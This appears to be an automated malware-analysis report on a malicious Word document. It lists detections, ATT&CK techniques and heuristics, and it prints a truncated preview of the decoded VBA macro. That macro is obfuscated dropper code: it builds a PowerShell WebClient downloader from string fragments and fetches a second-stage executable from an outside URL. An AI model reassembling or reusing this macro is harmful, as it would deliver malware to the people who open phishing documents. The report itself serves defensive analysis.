MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is an OLE file containing VBA macros, including an AutoOpen macro and a Shell() call, indicating malicious intent. The VBA script attempts to download a second-stage payload from the reconstructed URL 'http://charlesduzGb+zGbndafUC+fUCs.co.ukzGb+zGb+/iMpifUC+fUC/9wN.Split(9zGb+zGbwN,9zGfUC+fUC+zGbwzGb+zGbN)zGb+fUC+fUCzGb;2arkarapzGbPzHdmRm'. ClamAV detections further confirm its malicious nature as a dropper and phishing lure.
Heuristics 5
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://b�i�Rgeggd� In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72898 bytes |
SHA-256: a45174214f3e49b18a8a8570bcee59d885debd942eb4f0021edaad047e8b2f68 |
|||
|
Detection
ClamAV:
Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "RJuWcKT"
Function CLqzBqiiT()
On Error Resume Next
uqInKAGwz = 44224474 / koaAksVBMYloN - 536083786 + CSng(wCokwICaY) + 2 - Chr(7013) - fXiBqjpBMmTLlr / 8527 * utEOcnKVZrj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(AUNkJPbUNKT)
bSsUhniPh = 44224474 / zfqSMbNwD - 536083786 + CSng(nVwOjwkXIA) + 2 - Chr(7013) - XfFZqaBaSja / 8527 * ALsOnOG + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BYziqpjSkRW)
JdquXIRJ = Mid("2M0G'+'bhtz'+'Gb+zGbtfUC+fU'+'Cp://charlesduzGb+zGbndafUC'+'+fUCs.co.ukzGb+zGb'+'/iMpifUC+fUC/9wN.Split(9zGb'+'+zGbwN,9zGfUC+fUC'+'bfUC+fUC+zGbwzGb+z'+'GbN)zGb+fUC+fUCzGb;2arkarapzGbPzHdmRm", 4, 179)
SThjMr = 44224474 / cjjbazmR - 536083786 + CSng(GBPzMvLUBJJKFp) + 2 - Chr(7013) - zCJwJWRkZtlt / 8527 * jubEPht + Fix(7798) + 9905 * Sin(7) / 310 * Sin(wmzTPzLAK)
qujNziFjS = 44224474 / ETFGzzpbI - 536083786 + CSng(NNCjhZLNBGi) + 2 - Chr(7013) - upmPqLrhqKmI / 8527 * QKmNCLj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(LBuFVVjWI)
YwJzoNKAHW = 44224474 / XtCcYoq - 536083786 + CSng(ZpQpEbCH) + 2 - Chr(7013) - GhEuXvNAPMcu / 8527 * FjPsNAAHWn + Fix(7798) + 9905 * Sin(7) / 310 * Sin(IHECJiVRH)
IRoVEi = Mid("irHzE0KEGGb2zGb+7o", 10, 7)
AsoLFfABlr = 44224474 / AkUYPUjGd - 536083786 + CSng(blCbuhQOZAzv) + 2 - Chr(7013) - WjorKVqHKivlXh / 8527 * vSdvhwlZzTLnE + Fix(7798) + 9905 * Sin(7) / 310 * Sin(zHQFmzpbcZ)
AGhjbJJHkom = 44224474 / CoEdcKl - 536083786 + CSng(WzRRtSfQo) + 2 - Chr(7013) - tJuFlXoRnwXWik / 8527 * GsjPsPTEWKB + Fix(7798) + 9905 * Sin(7) / 310 * Sin(TTZGvroLQJ)
avRkXFJM = 44224474 / nbRDHpWAYTHW - 536083786 + CSng(NAlJpXz) + 2 - Chr(7013) - lmNaifljCUpE / 8527 * uVUVrdpn + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BplMsmMflFa)
UsbSp = Mid("mz0j0hqzGb2zGb+zGb4.com/UoJtK/fUC+fUCwDLVAOp", 8, 30)
wGqIHHdd = 44224474 / CjoKXmszRhnnaw - 536083786 + CSng(vhaFXvk) + 2 - Chr(7013) - VwNscft / 8527 * NwvdjDEwRd + Fix(7798) + 9905 * Sin(7) / 310 * Sin(kpfjwHuv)
mRjLz = 44224474 / FpTncDdHWsRS - 536083786 + CSng(itvJikkWXj) + 2 - Chr(7013) - JOHkrPjtmdjc / 8527 * zFfJfjScsjGzqO + Fix(7798) + 9905 * Sin(7) / 310 * Sin(GdKiJidNwtP)
JZmrS = 44224474 / lKmBSjTL - 536083786 + CSng(tQTXJaqf) + 2 - Chr(7013) - RrdintkzKp / 8527 * OkijnmCKt + Fix(7798) + 9905 * Sin(7) / 310 * Sin(CksmYNqN)
DzljOwjna = Mid("lzGbarfrzGb+zGbanzGb+zfUC'+'+fUCGbczGb+zGb = new-obzGb+zGbject SyfUC+fUCstem.NzGbfUC+fUC+zGbetfUC+fUC.zGb+zGbWebClzGb+zGbiezG'+'b+zGbnt;2azGb+zGbrnzGbfUmMJWci9kU8vfRsi", 2, 151)
mMkUjkDf = 44224474 / LXjtuQAL - 536083786 + CSng(EarrNIQiBkA) + 2 - Chr(7013) - CnJTBTM / 8527 * sjQPYHEMn + Fix(7798) + 9905 * Sin(7) / 310 * Sin(iqCCCCSr)
fVhdMMNa = 44224474 / fBbzIjPiXQ - 536083786 + CSng(niDNJkhP) + 2 - Chr(7013) - djBvJoUZniKBYu / 8527 * rPZjnsB + Fix(7798) + 9905 * Sin(7) / 310 * Sin(qzVawCQwslnt)
aFWLOwHh = 44224474 / aMfuIOGJkWatzn - 536083786 + CSng(kUJcSGDEvpBKz) + 2 - Chr(7013) - kGAJXmGNoIASzU / 8527 * NSlCKRhtqYpWH + Fix(7798) + 9905 * Sin(7) / 310 * Sin(FGEIJzQZjaBl)
kjuJEbIHhmR = Mid("fcj8VzjjjG8UHGj2ziWmRzGb+zGb9wN +'+' 2zGb+zfUC+fUCGbarkazGb+zGbrapazGb+zGbs fUC+fUCzGb+zGb+ 9wN.zGb+zGbexfUC+fUCe9zGb+fUC+fUCzGbwN'+';fozGb+'+'zGbrezGb+zGbaczGb+zGbh(2arabc iz'+'Gb+zGbfUC+fUCn zGb+zG'+'b2dZvbpmaz5KJNCVUr", 19, 186)
jvqTtu = 44224474 / AjqTOqvoGGOnBV - 536083786 + CSng(LBcGcBLwoNYWWk) + 2 - Chr(7013) - PlAFriiMY / 8527 * GtkrGnu + Fix(7798) + 9905 * Sin(7) / 310 * Sin(WmrJhRuphCGp)
fsqsGw = 44224474 / iYHOlZDj - 536083786 + CSng(KwhUWoTfGEa) + 2 - Chr(7013) - oonWzbnZoaM / 8527 * WDIhhPDwPZB + Fix(7798) + 9905 * Sin(7) / 310 * Sin(VlFHSiTQF)
whnZjw = 44224474 / YEoqdmviLc - 536083786 + CSng(DEVIbHhadpAza) + 2 - Chr(7013) - DjLCBjG / 8527 * hhovAcAzBLKD + Fix(7798) + 9905 * Sin(7) / 310 * Sin(cvmNaUf)
qYBASszE = Mid("i1o PQLCzMazGb3zGb+zGb4324zGb+zGb5);2arhuas =zGb+zGb 2arezGb+zfUC+fUCGfUC+fUCbnz'+'Gb+zGbv:pubzGb+zfU'+
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.